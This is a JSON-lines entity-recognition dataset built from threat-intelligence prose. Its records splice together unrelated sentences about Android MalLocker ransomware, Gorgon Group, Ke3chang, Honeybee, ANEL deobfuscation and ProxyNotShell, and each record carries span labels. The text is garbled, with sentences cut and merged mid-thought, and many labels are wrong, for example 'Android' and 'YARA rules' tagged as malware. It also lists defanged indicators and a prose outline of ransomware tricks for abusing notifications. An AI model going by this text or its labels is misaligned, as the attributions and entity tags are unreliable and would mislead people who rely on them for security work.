information about the signature of the binary , which can be used to help identify the author of a particular signed binary .", "spans": [{"start": 13, "end": 27, "label": "Indicator"}, {"start": 51, "end": 60, "label": "Organization"}, {"start": 156, "end": 330, "label": "Indicator"}]} {"text": "] cashnow [ . Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . 
By using the and instruction , As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 14, "end": 20, "label": "Organization"}, {"start": 199, "end": 203, "label": "Organization"}, {"start": 215, "end": 222, "label": "Organization"}]} {"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve \u2013 and no platform is immune . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas . the immediate values used in comparison look different from assigned ones . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": [{"start": 55, "end": 62, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 445, "end": 457, "label": "Malware"}, {"start": 530, "end": 536, "label": "System"}, {"start": 541, "end": 550, "label": "System"}]} {"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks . The modified code will consider this . 
Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 110, "end": 117, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 266, "end": 278, "label": "Organization"}, {"start": 354, "end": 410, "label": "Organization"}]} {"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks . The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) : The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim 's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 118, "end": 163, "label": "System"}, {"start": 215, "end": 222, "label": "Organization"}, {"start": 254, "end": 266, "label": "Organization"}, {"start": 340, "end": 344, "label": "Malware"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 458, "end": 465, "label": "Malware"}]} {"text": "Microsoft \u2019 s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks , as well as provide more tools to detect and respond to threats across domains and across platforms . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks . 
3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d . The collective has claimed responsibility for DDoS attacks , data theft , and leaks against entities across multiple industries , including transportation , defense , government and military , financial services , global institutions , and telecommunications .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 266, "end": 273, "label": "Organization"}, {"start": 352, "end": 364, "label": "Organization"}, {"start": 375, "end": 396, "label": "System"}, {"start": 439, "end": 503, "label": "Indicator"}, {"start": 552, "end": 564, "label": "Organization"}]} {"text": "Like all of Microsoft \u2019 s security solutions , these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs . The code is able to deobfuscate 34 of 38 functions ( 89% ) In recent years , healthcare providers are increasingly being targeted with coordinated , sophisticated Phishing and Business Email Compromise BEC campaigns .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 407, "end": 428, "label": "System"}, {"start": 547, "end": 567, "label": "Organization"}]} {"text": "For example , we found a piece of a particularly sophisticated Android ransomware with novel techniques and behavior , exemplifying the rapid evolution of mobile threats that we have also observed on other platforms . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly . . 
The differences between commercial spyware and digital extortion attacks You may have received an email something like , \u201c We know you \u2019ve visited this adult website .", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 301, "end": 306, "label": "System"}, {"start": 335, "end": 353, "label": "System"}, {"start": 358, "end": 383, "label": "Organization"}]} {"text": "The mobile ransomware , detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B , is the latest variant of a ransomware family that \u2019 s been in the wild for a while but has been evolving non-stop . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack . It should be noted every function is not always obfuscated . Ashley Madison \u2019s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": [{"start": 36, "end": 54, "label": "System"}, {"start": 71, "end": 92, "label": "Indicator"}, {"start": 594, "end": 660, "label": "System"}]} {"text": "This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains . 
The failure examples are : From what we \u2019ve seen in Hack520 \u2019s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": [{"start": 264, "end": 276, "label": "Organization"}, {"start": 287, "end": 292, "label": "System"}, {"start": 393, "end": 408, "label": "Organization"}, {"start": 529, "end": 540, "label": "System"}, {"start": 574, "end": 580, "label": "Organization"}, {"start": 609, "end": 622, "label": "Organization"}]} {"text": "The new variant caught our attention because it \u2019 s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan . Not yet implemented cases ( e.g , Darkrace specifically targets Windows operating systems and has several similarities to LockBit .", "spans": [{"start": 276, "end": 283, "label": "Organization"}, {"start": 363, "end": 382, "label": "Organization"}, {"start": 441, "end": 449, "label": "Malware"}, {"start": 471, "end": 496, "label": "System"}, {"start": 529, "end": 536, "label": "Organization"}]} {"text": "As with most Android ransomware , this new threat doesn \u2019 t actually block access to files by encrypting them . Leveraging click counts for the campaign for Bitly , we were able to see Gorgon Group 's activity volume increase throughout April . 
a conditional jump of the dispatcher predecessor\u2019s tail instruction in goto N predecessors case , SysUpdate is a featurerich backdoor that has multiple capabilities , including", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 157, "end": 162, "label": "System"}, {"start": 185, "end": 197, "label": "Organization"}, {"start": 343, "end": 352, "label": "Malware"}]} {"text": "Instead , it blocks access to devices by displaying a screen that appears over every other window , such that the user can \u2019 t do anything else . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan . consecutive if-statement flattened blocks ) FULLHOUSE.DOORED ( com.docker.vmnat , npx - cli , us.zoom . ZoomUpdate )", "spans": [{"start": 203, "end": 215, "label": "Organization"}, {"start": 258, "end": 284, "label": "Organization"}, {"start": 357, "end": 373, "label": "System"}]} {"text": "The said screen is the ransom note , which contains threats and instructions to pay the ransom . Starting in mid-February . . The file path at the end of the configuration is used to store configuration data that is encrypted using AES-128 .", "spans": [{"start": 126, "end": 241, "label": "Indicator"}]} {"text": "What \u2019 s innovative about this ransomware is how it displays its ransom note . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations . 
An incorrect choice of control flow dispatcher and first block ( algorithm error ) Mandiant has observed RGB units utilize a series of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to obscure their source address .", "spans": [{"start": 124, "end": 136, "label": "Organization"}, {"start": 225, "end": 246, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 392, "end": 401, "label": "Organization"}]} {"text": "In this blog , we \u2019 ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven \u2019 t seen leveraged by malware before , as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note . Unit 42 researchers have been tracking an active campaign . . The IP range for \u201c PIG GOD \u201d is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 \u2019s pet pig .", "spans": [{"start": 106, "end": 113, "label": "System"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 354, "end": 405, "label": "Indicator"}, {"start": 497, "end": 504, "label": "Indicator"}]} {"text": "New scheme , same goal In the past , Android ransomware used a special permission called \u201c SYSTEM_ALERT_WINDOW \u201d to display their ransom note . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . These fixes will be prioritized for future releases . 
The key to the success of an effort like No More Ransomware is informationsharing and collaboration .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 208, "end": 232, "label": "Malware"}, {"start": 244, "end": 257, "label": "Vulnerability"}]} {"text": "Apps that have this permission can draw a window that belongs to the system group and can \u2019 t be dismissed . Beginning in early March 2018 , Unit 42 started observing Gorgon group attacks against Russian , Spanish and United States government agencies operating in Pakistan . Additionally there is a known issue with the result ( e.g , the remaining loop or paradoxical decompiled code ) With regards to these similarities , we highlight the following trends which could manifest in future OT malware : \u2022", "spans": [{"start": 141, "end": 148, "label": "Organization"}, {"start": 232, "end": 251, "label": "Organization"}, {"start": 490, "end": 500, "label": "Malware"}]} {"text": "No matter what button is pressed , the window stays on top of all other windows . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group . 
, A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": [{"start": 94, "end": 106, "label": "Organization"}, {"start": 148, "end": 174, "label": "System"}, {"start": 179, "end": 194, "label": "System"}, {"start": 219, "end": 231, "label": "Organization"}, {"start": 236, "end": 343, "label": "Indicator"}, {"start": 390, "end": 421, "label": "Organization"}, {"start": 433, "end": 532, "label": "Indicator"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 569, "end": 586, "label": "System"}]} {"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan . 
using the following IDAPython command in Output window : The attackers then ran reconnaissance commands such as whoami , netstat , quser , and net share , and tried to enumerate other servers for lateral movement with the quser and net view commands .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 259, "end": 271, "label": "Organization"}, {"start": 330, "end": 339, "label": "System"}, {"start": 371, "end": 380, "label": "Organization"}, {"start": 422, "end": 428, "label": "System"}, {"start": 431, "end": 438, "label": "System"}, {"start": 441, "end": 446, "label": "System"}, {"start": 453, "end": 462, "label": "System"}, {"start": 532, "end": 537, "label": "System"}, {"start": 542, "end": 550, "label": "System"}]} {"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks . idc.load_and_run_plugin None C2 RSA Verification", "spans": [{"start": 112, "end": 124, "label": "Organization"}, {"start": 141, "end": 152, "label": "Organization"}]} {"text": "To catch these threats , security solutions used heuristics that focused on detecting this behavior . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work . 
( A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 154, "end": 166, "label": "Organization"}, {"start": 366, "end": 384, "label": "Vulnerability"}, {"start": 388, "end": 404, "label": "Vulnerability"}]} {"text": "Google later implemented platform-level changes that practically eliminated this attack surface . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor . \u201c HexRaysDeob \u201d The script downloads two files to locations defined by the variables ffn and fn , but only the first file is executed via the system function .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 114, "end": 138, "label": "Organization"}, {"start": 190, "end": 205, "label": "System"}, {"start": 210, "end": 221, "label": "System"}]} {"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the \u201c above dangerous \u201d category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . 
, The focus should be on isolating the affected devices andor networks to prevent further spread and minimize the impact .", "spans": [{"start": 429, "end": 440, "label": "System"}, {"start": 530, "end": 537, "label": "System"}, {"start": 586, "end": 599, "label": "System"}, {"start": 600, "end": 610, "label": "Malware"}, {"start": 680, "end": 688, "label": "Organization"}]} {"text": "other features , but these aren \u2019 t as effective . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks . 0xdead ) All protocols use their standard assigned ports.[2][3 ] Dragonfly has used SMB for C2.[4 ]", "spans": [{"start": 57, "end": 69, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 282, "end": 285, "label": "System"}, {"start": 290, "end": 295, "label": "System"}]} {"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . . These servers may be approved , but a compromised network endpoint can be modified to mask the final destination of the server requests originating externally .", "spans": [{"start": 427, "end": 433, "label": "System"}, {"start": 462, "end": 486, "label": "Malware"}]} {"text": "Other ransomware families use infinite loops of drawing non-system windows , but in between drawing and redrawing , it \u2019 s possible for users to go to settings and uninstall the offending app . 
This key was also used in the Honeybee campaign and appears to have been used since August 2017 . The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function . No More Ransom now includes 185 partners from the public sector , private industry , law enforcement , and academia .", "spans": [{"start": 67, "end": 74, "label": "System"}]} {"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we \u2019 ve seen before . Several additional documents surfaced between January 17 and February 3 . This allows an analyst to quickly check if there are any lost blocks by control flow unflattening . one base64 encoded string but multiple , separated by a character .", "spans": [{"start": 8, "end": 15, "label": "Malware"}, {"start": 89, "end": 96, "label": "Malware"}, {"start": 342, "end": 366, "label": "Malware"}]} {"text": "To surface its ransom note , it uses a series of techniques that take advantage of the following components on Android : The \u201c call \u201d notification , among several categories of notifications that Android supports , which requires immediate user attention . All contain the same Visual Basic macro code and author name as Honeybee . After the check , Pikabot is a new malware first seen in early 2023 .", "spans": [{"start": 111, "end": 118, "label": "System"}, {"start": 196, "end": 203, "label": "System"}, {"start": 321, "end": 329, "label": "Organization"}, {"start": 350, "end": 357, "label": "Malware"}]} {"text": "The \u201c onUserLeaveHint ( ) \u201d callback method of the Android Activity ( i.e. , the typical GUI screen the user sees ) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice , for example , when the user presses the Home key . Some of the malicious documents were test files without the implant . 
the original result can be restored by using the following command : There are several methods in which SCIL programs can execute , such as an engineer / operator clicking a button or image within the MicroSCADA system , scheduled or process derived changes , or in this case manual execution .", "spans": [{"start": 51, "end": 67, "label": "System"}, {"start": 330, "end": 340, "label": "System"}, {"start": 564, "end": 581, "label": "System"}]} {"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea . idc.load_and_run_plugin Additionally , 20 said they had experienced data breaches by former employees .", "spans": [{"start": 172, "end": 180, "label": "Organization"}]} {"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( \u201c call \u201d ) \u2013 This means that the notification is built as a very important notification that needs special privilege . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada . ( On hosts of interest , Agrius deploys its own custom malware a .NET backdoor called IPsec Helper , which registers itself as a service to establish persistence .", "spans": [{"start": 234, "end": 242, "label": "Organization"}, {"start": 388, "end": 394, "label": "Organization"}, {"start": 418, "end": 425, "label": "Malware"}, {"start": 442, "end": 461, "label": "Malware"}]} {"text": "setFullScreenIntent ( ) \u2013 This API wires the notification to a GUI so that it pops up when the user taps on it . Honeybee appears to target humanitarian aid and inter-Korean affairs . 
\u201c HexRaysDeob \u201d However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 186, "end": 197, "label": "System"}, {"start": 245, "end": 255, "label": "Organization"}]} {"text": "At this stage , half the job is done for the malware . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor . , It allows security researchers to analyze the source code and understand the attacker \u2019s tactics , techniques and procedures ( TTPs ) , which helps security professionals develop effective detection rules and enhance security products ' capabilities in combating ransomware threats .", "spans": [{"start": 55, "end": 86, "label": "Organization"}, {"start": 257, "end": 272, "label": "System"}]} {"text": "However , the malware wouldn \u2019 t want to depend on user interaction to trigger the ransomware screen , so , it adds another functionality of Android callback : As the code snippet shows , the malware overrides the onUserLeaveHint ( ) callback function of Activity class . Large-scale cyber espionage campaigns such as \" GhostNet \" . 0xf001 ) Therefore , having access to such code allows threat actors with minimum programming knowledge to modify and compile their own ransomware variants .", "spans": [{"start": 141, "end": 148, "label": "System"}]} {"text": "The function onUserLeaveHint ( ) is called whenever the malware screen is pushed to background , causing the in-call Activity to be automatically brought to the foreground . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . . 
The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": [{"start": 209, "end": 216, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}]} {"text": "Recall that the malware hooked the RansomActivity intent with the notification that was created as a \u201c call \u201d type notification . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe . The compiler-level obfuscations like opaque predicates and control flow flattening are started to be observed in the wild by analyst and researchers . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 165, "end": 172, "label": "Organization"}, {"start": 203, "end": 215, "label": "Organization"}, {"start": 234, "end": 242, "label": "Organization"}, {"start": 591, "end": 649, "label": "Organization"}, {"start": 660, "end": 667, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}]} {"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 . 
Currently malware with the obfuscations is limited , We would also like to thank Trellix for our continued partnership and for providing supporting detection YARA rules and associated indicators .", "spans": [{"start": 170, "end": 178, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 340, "end": 347, "label": "Organization"}, {"start": 417, "end": 427, "label": "Malware"}]} {"text": "Machine learning module indicates continuous evolution As mentioned , this ransomware is the latest variant of a malware family that has undergone several stages of evolution . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week . however TAU expects not only APT10 but also other threat actors will start to use them . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 177, "end": 184, "label": "Organization"}, {"start": 224, "end": 243, "label": "System"}, {"start": 246, "end": 249, "label": "System"}, {"start": 276, "end": 290, "label": "Organization"}, {"start": 320, "end": 323, "label": "Organization"}, {"start": 341, "end": 346, "label": "Organization"}, {"start": 401, "end": 432, "label": "Organization"}, {"start": 478, "end": 529, "label": "Organization"}]} {"text": "The knowledge graph below shows the various techniques this ransomware family has been seen using , including abusing the system alert window , abusing accessibility features , and , more recently , abusing notification services . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and exfiltration . Unfortunately , \u2022 Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. 
, PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": [{"start": 518, "end": 529, "label": "System"}, {"start": 533, "end": 539, "label": "System"}, {"start": 545, "end": 555, "label": "System"}, {"start": 559, "end": 594, "label": "System"}]} {"text": "This ransomware family \u2019 s long history tells us that its evolution is far from over . The Ke3chang attackers have been active since at least 2010 . in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 91, "end": 99, "label": "Organization"}, {"start": 100, "end": 109, "label": "Organization"}, {"start": 322, "end": 413, "label": "Indicator"}]} {"text": "We expect it to churn out new variants with even more sophisticated techniques . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations . 
In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": [{"start": 108, "end": 117, "label": "Organization"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 154, "end": 173, "label": "Organization"}, {"start": 180, "end": 189, "label": "Organization"}, {"start": 192, "end": 205, "label": "Organization"}, {"start": 208, "end": 222, "label": "Organization"}, {"start": 225, "end": 228, "label": "Organization"}, {"start": 251, "end": 262, "label": "System"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 289, "end": 293, "label": "Malware"}]} {"text": "In fact , recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size , a valuable function given the variety of Android devices . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . The modified code is available publically here . 
We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 213, "end": 220, "label": "System"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 340, "end": 346, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 374, "end": 393, "label": "Organization"}, {"start": 396, "end": 405, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 424, "end": 438, "label": "Organization"}, {"start": 514, "end": 525, "label": "System"}, {"start": 556, "end": 583, "label": "System"}, {"start": 628, "end": 640, "label": "Organization"}]} {"text": "The frozen TinyML model is useful for making sure images fit the screen without distortion . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers . The summary of the modifications is : What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 11, "end": 17, "label": "System"}, {"start": 107, "end": 114, "label": "Organization"}, {"start": 183, "end": 191, "label": "Organization"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 275, "end": 304, "label": "Organization"}]} {"text": "In the case of this ransomware , using the model would ensure that its ransom note\u2014typically fake police notice or explicit images supposedly found on the device\u2014would appear less contrived and more believable , increasing the chances of the user paying for the ransom . 
In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs . New patterns and data-flow tracking for opaque predicates . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 523, "end": 634, "label": "Vulnerability"}]} {"text": "The library that uses tinyML is not yet wired to the malware \u2019 s functionalities , but its presence in the malware code indicates the intention to do so in future variants . Ke3chang attackers have used spear-phishing emails . Analysis in multiple maturity levels , One interesting detail about Hack520 is his apparent love for pigs , as seen in his use of the word in his email addresses .", "spans": [{"start": 22, "end": 28, "label": "System"}, {"start": 174, "end": 182, "label": "Organization"}, {"start": 183, "end": 192, "label": "Organization"}, {"start": 295, "end": 302, "label": "Organization"}]} {"text": "We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights to the community for broad protection against these evolving mobile threats . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . considering multiple control flow dispatchers and various jump cases for control flow flattening . 
The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": [{"start": 202, "end": 210, "label": "Organization"}, {"start": 232, "end": 259, "label": "Vulnerability"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 321, "end": 335, "label": "Malware"}, {"start": 338, "end": 351, "label": "Vulnerability"}, {"start": 358, "end": 374, "label": "System"}, {"start": 377, "end": 390, "label": "Vulnerability"}, {"start": 524, "end": 537, "label": "System"}, {"start": 565, "end": 588, "label": "Organization"}, {"start": 606, "end": 610, "label": "Indicator"}, {"start": 631, "end": 654, "label": "Organization"}]} {"text": "Protecting organizations from threats across domains and platforms Mobile threats continue to rapidly evolve , with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal , whether financial gain or finding an entry point to broader network compromise . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . The tool can work for almost all obfuscated functions in the tested sample . Mandiant is investigating multiple instances of successful exploitation of CVE-2023 - 4966 that resulted in the takeover of legitimate user sessions on NetScaler ADC and Gateway appliances .", "spans": [{"start": 338, "end": 346, "label": "Organization"}, {"start": 347, "end": 356, "label": "Organization"}, {"start": 610, "end": 625, "label": "Vulnerability"}]} {"text": "This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" . 
This implementation will deobfuscate approximately 89% of encountered functions . The next is to call with expecting it to return 0 as it is likely to have an environment variable name like that .", "spans": [{"start": 203, "end": 211, "label": "Organization"}, {"start": 212, "end": 221, "label": "Organization"}, {"start": 272, "end": 278, "label": "System"}, {"start": 285, "end": 288, "label": "System"}, {"start": 299, "end": 304, "label": "System"}]} {"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals . it is a typical first stage backdoor commonly found in APT attacks . This provides researchers and analyst broad tool to attack this type of obfuscation , We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB .", "spans": [{"start": 417, "end": 427, "label": "System"}, {"start": 452, "end": 474, "label": "Organization"}, {"start": 508, "end": 511, "label": "Organization"}]} {"text": "Microsoft Defender for Endpoint on Android , now generally available , extends Microsoft \u2019 s industry-leading endpoint protection to Android . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . and if it adopted in other families . 
Actors behind many of these new ransomware variants , including Sirattacker , Chaos 2.0 , Chaos 4.0 , DCrypt , and Shadow Men Team , are demanding payments ranging from USD $ 3.50 to $ 4,390 in Bitcoin from victims .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 35, "end": 42, "label": "System"}, {"start": 79, "end": 88, "label": "Organization"}, {"start": 133, "end": 140, "label": "System"}, {"start": 147, "end": 156, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 253, "end": 259, "label": "Organization"}, {"start": 262, "end": 272, "label": "Organization"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 287, "end": 306, "label": "Organization"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 325, "end": 338, "label": "Organization"}, {"start": 341, "end": 355, "label": "Organization"}, {"start": 460, "end": 471, "label": "Organization"}, {"start": 474, "end": 485, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 498, "end": 504, "label": "Organization"}, {"start": 511, "end": 526, "label": "Organization"}]} {"text": "It detects this ransomware ( AndroidOS/MalLocker.B ) , as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics , in addition to content-based detection . All of the CnC communications are performed over the HTTP protocol . In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler . 
